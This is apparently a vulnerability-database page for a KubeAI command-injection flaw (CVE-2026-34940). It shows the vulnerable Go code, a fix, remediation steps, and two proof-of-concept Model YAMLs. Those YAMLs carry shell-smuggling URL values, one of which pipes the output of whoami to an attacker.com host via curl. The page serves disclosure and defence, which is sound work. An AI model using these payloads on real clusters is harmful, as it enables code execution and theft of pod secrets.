Skip to main content

Kubernetes CVE-2026-34940

| EUVDEUVD-2026-19355 HIGH
OS Command Injection (CWE-78)
2026-04-01 https://github.com/kubeai-project/kubeai GHSA-324q-cwx9-7crr
8.7
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
8.7 HIGH
AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
High
User Interaction
None
Scope
Changed
Confidentiality
High
Integrity
High
Availability
None

Lifecycle Timeline

5
Re-analysis Queued
Apr 15, 2026 - 21:22 vuln.today
cvss_changed
Patch released
Apr 02, 2026 - 14:30 nvd
Patch available
EUVD ID Assigned
Apr 02, 2026 - 00:15 euvd
EUVD-2026-19355
Analysis Generated
Apr 02, 2026 - 00:15 vuln.today
CVE Published
Apr 01, 2026 - 23:22 nvd
HIGH 8.7

DescriptionGitHub Advisory

CHAMP: Description

Summary

The ollamaStartupProbeScript() function in internal/modelcontroller/engine_ollama.go constructs a shell command string using fmt.Sprintf with unsanitized model URL components (ref, modelParam). This shell command is executed via bash -c as a Kubernetes startup probe. An attacker who can create or update Model custom resources can inject arbitrary shell commands that execute inside model server pods.

Details

The parseModelURL() function in internal/modelcontroller/model_source.go uses a regex (^([a-z0-9]+):\/\/([^?]+)(\?.*)?$) to parse model URLs. The ref component (capture group 2) matches [^?]+, allowing any characters except ?, including shell metacharacters like ;, |, $(), and backticks.

The ?model= query parameter (modelParam) is also extracted without any sanitization.

Vulnerable code (permalink):

go
func ollamaStartupProbeScript(m *kubeaiv1.Model, u modelURL) string {
    startupScript := ""
    if u.scheme == "pvc" {
        startupScript = fmt.Sprintf("/bin/ollama cp %s %s", u.modelParam, m.Name)
    } else {
        if u.pull {
            pullCmd := "/bin/ollama pull"
            if u.insecure {
                pullCmd += " --insecure"
            }
            startupScript = fmt.Sprintf("%s %s && /bin/ollama cp %s %s", pullCmd, u.ref, u.ref, m.Name)
        } else {
            startupScript = fmt.Sprintf("/bin/ollama cp %s %s", u.ref, m.Name)
        }
    }
    // ...
    return startupScript
}

This script is then used as a bash -c startup probe (permalink):

go
StartupProbe: &corev1.Probe{
    ProbeHandler: corev1.ProbeHandler{
        Exec: &corev1.ExecAction{
            Command: []string{"bash", "-c", startupProbeScript},
        },
    },
},

Compare with the vLLM engine which safely passes the model ref as a command-line argument (not through a shell):

go
// engine_vllm.go - safe: args are passed directly, no shell involved
args := []string{
    "--model=" + vllmModelFlag,
    "--served-model-name=" + m.Name,
}

URL parsing (permalink):

go
var modelURLRegex = regexp.MustCompile(`^([a-z0-9]+):\/\/([^?]+)(\?.*)?$`)

func parseModelURL(urlStr string) (modelURL, error) {
    // ref = matches[2] -> [^?]+ allows shell metacharacters
    // modelParam from ?model= query param -> completely unsanitized
}

There is no admission webhook or CRD validation that sanitizes the URL field.

PoC

Attack vector 1: Command injection via ollama:// URL ref

yaml
apiVersion: kubeai.org/v1
kind: Model
metadata:
  name: poc-cmd-inject
spec:
  features: ["TextGeneration"]
  engine: OLlama
  url: "ollama://registry.example.com/model;id>/tmp/pwned;echo"
  minReplicas: 1
  maxReplicas: 1

The startup probe script becomes:

bash
/bin/ollama pull registry.example.com/model;id>/tmp/pwned;echo && /bin/ollama cp registry.example.com/model;id>/tmp/pwned;echo poc-cmd-inject && /bin/ollama run poc-cmd-inject hi

The injected id>/tmp/pwned command executes inside the pod.

Attack vector 2: Command injection via ?model= query parameter

yaml
apiVersion: kubeai.org/v1
kind: Model
metadata:
  name: poc-cmd-inject-pvc
spec:
  features: ["TextGeneration"]
  engine: OLlama
  url: "pvc://my-pvc?model=qwen2:0.5b;curl${IFS}http://attacker.com/$(whoami);echo"
  minReplicas: 1
  maxReplicas: 1

The startup probe script becomes:

bash
/bin/ollama cp qwen2:0.5b;curl${IFS}http://attacker.com/$(whoami);echo poc-cmd-inject-pvc && /bin/ollama run poc-cmd-inject-pvc hi

Impact

  1. Arbitrary command execution inside model server pods by any user with Model CRD create/update RBAC
  2. In multi-tenant Kubernetes clusters, a tenant with Model creation permissions (but not cluster-admin) can execute arbitrary commands in model pods, potentially accessing secrets, service account tokens, or lateral-moving to other cluster resources
  3. Data exfiltration from the model pod's environment (environment variables, mounted secrets, service account tokens)
  4. Compromise of the model serving infrastructure

Suggested Fix

Replace the bash -c startup probe with either:

  1. An exec probe that passes arguments as separate array elements (like the vLLM engine does), or
  2. Validate/sanitize u.ref and u.modelParam to only allow alphanumeric characters, slashes, colons, dots, and hyphens before interpolating into the shell command

Example fix:

go
// Option 1: Use separate args instead of bash -c
Command: []string{"/bin/ollama", "pull", u.ref}

// Option 2: Sanitize inputs
var safeModelRef = regexp.MustCompile(`^[a-zA-Z0-9._:/-]+$`)
if !safeModelRef.MatchString(u.ref) {
    return "", fmt.Errorf("invalid model reference: %s", u.ref)
}

AnalysisAI

Command injection in KubeAI Ollama model controller allows Kubernetes users with Model CRD write permissions to execute arbitrary shell commands inside model server pods. The vulnerability stems from unsanitized URL components (model ref and query parameters) being interpolated into bash startup probe scripts. With CVSS 8.7 (AV:N/AC:L/PR:H/UI:N/S:C), this represents a significant privilege escalation risk in multi-tenant clusters where Model creation is delegated to non-admin users. No public exploit identified at time of analysis, though detailed proof-of-concept payloads are documented in the GitHub advisory.

Technical ContextAI

KubeAI is a Kubernetes operator for serving AI/ML models using engines like Ollama and vLLM. The affected component is the Ollama engine's startup probe generation in internal/modelcontroller/engine_ollama.go. When a Model custom resource is created with engine: OLlama, the controller constructs a Kubernetes startup probe using bash -c with a dynamically built command string. The parseModelURL() function extracts the model reference using regex ^([a-z0-9]+):\/\/([^?]+)(\?.*)?$ where capture group 2 (the ref component) permits any character except question marks, including shell metacharacters like semicolons, pipes, backticks, and command substitution syntax. The extracted ref and modelParam values are passed directly to fmt.Sprintf() without validation or escaping, then executed via bash -c inside the pod's startup probe. This is a textbook CWE-78 (OS Command Injection via Improper Neutralization of Special Elements) vulnerability. The vLLM engine implementation demonstrates the correct pattern: passing model references as separate command-line arguments in an array rather than through shell interpolation.

RemediationAI

Apply patches released by the KubeAI project addressing GHSA-324q-cwx9-7crr. The GitHub security advisory at https://github.com/kubeai-project/kubeai/security/advisories/GHSA-324q-cwx9-7crr should be monitored for patched releases. The fix should implement one of two approaches: replace bash -c startup probes with direct exec probes using separate command arguments (following the vLLM engine pattern with Command arrays like /bin/ollama, pull, modelref), or implement strict input validation using allowlist regex patterns permitting only alphanumeric characters, slashes, colons, dots, and hyphens in model URL components before interpolation. As an immediate mitigation, restrict Model CRD create/update permissions using Kubernetes RBAC to only fully trusted cluster administrators, removing these permissions from application teams or service accounts. Audit existing Model custom resources for suspicious URL patterns containing shell metacharacters. Implement admission webhooks or CRD validation rules to reject Model resources with URLs containing characters outside the safe allowlist. Consider deploying Pod Security Standards to restrict the capabilities available to model server pods, limiting blast radius if exploitation occurs.

CVE-2025-1974 CRITICAL POC
9.8 Mar 25

A critical vulnerability in Kubernetes ingress-nginx controller allows unauthenticated attackers with pod network access

CVE-2026-45321 CRITICAL POC
9.6 May 12

Credential-harvesting malware compromised 84 versions of 42 TanStack npm packages on 2026-05-11 via chained GitHub Actio

CVE-2025-1098 HIGH POC
8.8 Mar 25

Kubernetes ingress-nginx contains a configuration injection vulnerability via the mirror-target and mirror-host Ingress

CVE-2025-24514 HIGH POC
8.8 Mar 25

A security issue was discovered in ingress-nginx https://github.com/kubernetes/ingress-nginx where the `auth-url` Ingres

CVE-2025-1097 HIGH POC
8.8 Mar 25

A security issue was discovered in ingress-nginx https://github.com/kubernetes/ingress-nginx where the `auth-tls-match-c

CVE-2020-8554 MEDIUM POC
6.3 Jan 21

Kubernetes API server in all versions allow an attacker who is able to create a ClusterIP service and set the spec.exter

CVE-2025-55190 CRITICAL POC
9.9 Sep 04

Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. Rated critical severity (CVSS 9.9), this vulne

CVE-2018-18843 CRITICAL POC
10.0 Dec 04

The Kubernetes integration in GitLab Enterprise Edition 11.x before 11.2.8, 11.3.x before 11.3.9, and 11.4.x before 11.4

CVE-2026-22039 CRITICAL POC
9.9 Jan 27

Kyverno Kubernetes policy engine prior to 1.x has a privilege escalation vulnerability (CVSS 9.9) allowing policy bypass

CVE-2024-42480 CRITICAL POC
9.9 Aug 12

Kamaji is the Hosted Control Plane Manager for Kubernetes. Rated critical severity (CVSS 9.9), this vulnerability is rem

CVE-2023-28110 CRITICAL POC
9.9 Mar 16

Jumpserver is a popular open source bastion host, and Koko is a Jumpserver component that is the Go version of coco, ref

CVE-2026-25996 CRITICAL POC
9.8 Feb 12

String filter bypass in Inspektor Gadget Kubernetes eBPF tooling before fix. Insufficient string escaping enables filter

Share

CVE-2026-34940 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy